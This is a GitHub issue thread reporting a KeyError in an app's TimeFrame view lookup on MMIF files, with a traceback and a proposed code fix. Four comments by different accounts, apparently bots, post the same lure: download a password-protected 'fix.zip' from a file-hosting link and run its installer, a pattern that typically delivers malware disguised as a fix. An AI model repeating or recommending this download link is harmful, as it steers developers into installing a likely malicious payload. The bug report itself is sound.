### ISSUE TITLE
Failure in accessing views with TimeFrame

### ISSUE THREAD

**Issue by 1192119703jzx** [clamsproject/app-east-wrapper#10]
### Bug Description

When I run the app.py with an input mmif file with a view containing timeframe, it returns ```keyError: http://mmif.clams.ai/vocabulary/TimeFrame/v5```

The following line of code caused the bug:
```
views_with_tframe = [v for v in mmif.get_views_for_document(videodocument.id) if v.metadata.contains[AnnotationTypes.TimeFrame]]
```
There are two potential issues with this line of code. First, for some input mmif files, they don't have the corresponding property ```"document": "d1"``` in their views with timeframe. This would cause the code be unable to capture the views that have timeframe using the code ```mmif.get_views_for_document(videodocument.id)```
Second, ```v.metadata.contains[AnnotationTypes.TimeFrame]```will always cause the keyError because when there isn't such a key "http://mmif.clams.ai/vocabulary/TimeFrame/v5" in the dictionary named "contains", it will return KeyError.

### Reproduction steps

Run the app with an input miff file with a view containing timeframe. 

### Screenshots

Traceback (most recent call last):
  File "/home/zixinjiang/east/lib64/python3.9/site-packages/clams/restify/__init__.py", line 146, in post
    return self.json_to_response(self.cla.annotate(raw_data, **raw_params))
  File "/home/zixinjiang/east/lib64/python3.9/site-packages/clams/app/__init__.py", line 151, in annotate
    annotated = self._annotate(mmif, **refined)
  File "/home/zixinjiang/app-east-textdetection/app2.py", line 46, in _annotate
    mmif = self.run_on_video(mmif, videodocument, new_view, **parameters)
  File "/home/zixinjiang/app-east-textdetection/app2.py", line 94, in run_on_video
    views_with_tframe = [v for v in mmif.get_views_for_document(videodocument.id)
  File "/home/zixinjiang/app-east-textdetection/app2.py", line 95, in <listcomp>
    if v.metadata.contains[AnnotationTypes.TimeFrame]]
  File "/home/zixinjiang/east/lib64/python3.9/site-packages/mmif/serialize/model.py", line 477, in __getitem__
    return self._items.__getitem__(key)
KeyError: http://mmif.clams.ai/vocabulary/TimeFrame/v5

### Additional context

This bug could be solved by changing the code in such a way:
```
views_with_tframe = mmif.get_views_contain(AnnotationTypes.TimeFrame)
```

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
